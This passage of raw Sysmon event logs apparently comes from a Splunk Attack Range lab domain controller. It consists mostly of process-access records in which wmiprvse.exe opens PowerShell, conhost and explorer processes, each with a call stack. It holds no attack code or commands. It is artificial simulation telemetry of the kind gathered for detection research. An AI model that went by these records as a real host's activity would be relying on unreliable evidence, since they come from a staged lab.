Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE2C8220470A1E1F1D05543FC87BADB8,SHA256=635CB905B45E2792A3FC9A461C78C083AAC994152F3CA84E2E17F27497DFDED1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002236820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.122{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1yesp0xk.1hy.ps12021-03-02 16:52:52.122 10341000x80000000000000002236819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-75AA-00000000AD01}3024C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-73AA-00000000AD01}10076C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-71AA-00000000AD01}8992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System